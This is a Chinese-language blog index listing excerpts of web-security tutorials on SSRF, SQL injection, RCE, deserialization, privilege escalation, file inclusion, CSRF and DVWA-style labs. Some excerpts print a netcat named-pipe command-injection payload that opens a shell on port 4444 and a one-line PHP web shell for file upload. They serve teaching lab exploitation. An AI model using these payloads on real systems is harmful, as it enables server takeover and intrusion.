摘要: SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据数据流:攻击者 >服务器 > 阅读全文
posted @ 2020-02-23 23:32 joker0xxx3 阅读(656) 评论(0) 推荐(0) 编辑
摘要: 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中 阅读全文
posted @ 2020-02-23 23:30 joker0xxx3 阅读(460) 评论(0) 推荐(0) 编辑
摘要: RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的 阅读全文
posted @ 2020-02-23 23:21 joker0xxx3 阅读(872) 评论(0) 推荐(0) 编辑
摘要: 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 序列化serialize()序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); / 阅读全文
posted @ 2020-02-23 23:18 joker0xxx3 阅读(1259) 评论(0) 推荐(0) 编辑
摘要: 如果使用A用户的权限去操作B用户的数据,A的权限小于B的权限,如果能够成功操作,则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。 一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,当用户对权限页面内的信息进行这些操作时,后台需要对 对当前用户的权 阅读全文
posted @ 2020-02-23 23:14 joker0xxx3 阅读(314) 评论(0) 推荐(0) 编辑
摘要: File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:include(),include_once()require(),require_onc 阅读全文
posted @ 2020-02-23 23:11 joker0xxx3 阅读(357) 评论(0) 推荐(0) 编辑
摘要: Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有 阅读全文
posted @ 2020-02-23 23:09 joker0xxx3 阅读(397) 评论(0) 推荐(0) 编辑
摘要: 开门见山 ·Low ·Medium ·High · 命令执行监听端口 ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe nc 192.168.31.100 4444 · 反弹shell 拷贝shell文件 启动kali的apache服 阅读全文
posted @ 2020-02-06 15:41 joker0xxx3 阅读(447) 评论(0) 推荐(0) 编辑
摘要: 开门见山 · 目录遍历 替换成 2. 文件包含可以使用 绝对路径 也可以 3. 可以使用文件包含来包含一个网址,或者是一个shell 远程文件 空字符绕过字符过滤 %00 阅读全文
posted @ 2020-02-06 15:37 joker0xxx3 阅读(623) 评论(0) 推荐(0) 编辑
摘要: 开门见山 1. 准备一个shell <?php echo shell_exec($_GET['cmd']);?> 2. 上传文件 3. 利用shell 4. Burp抓包,1是文件大小,2是文件类型 5. mimetype判断文件类型 6. 使用1.php.jpg 绕过一些文件后缀检查 7. 图片1 阅读全文
posted @ 2020-02-06 15:24 joker0xxx3 阅读(233) 评论(0) 推荐(0) 编辑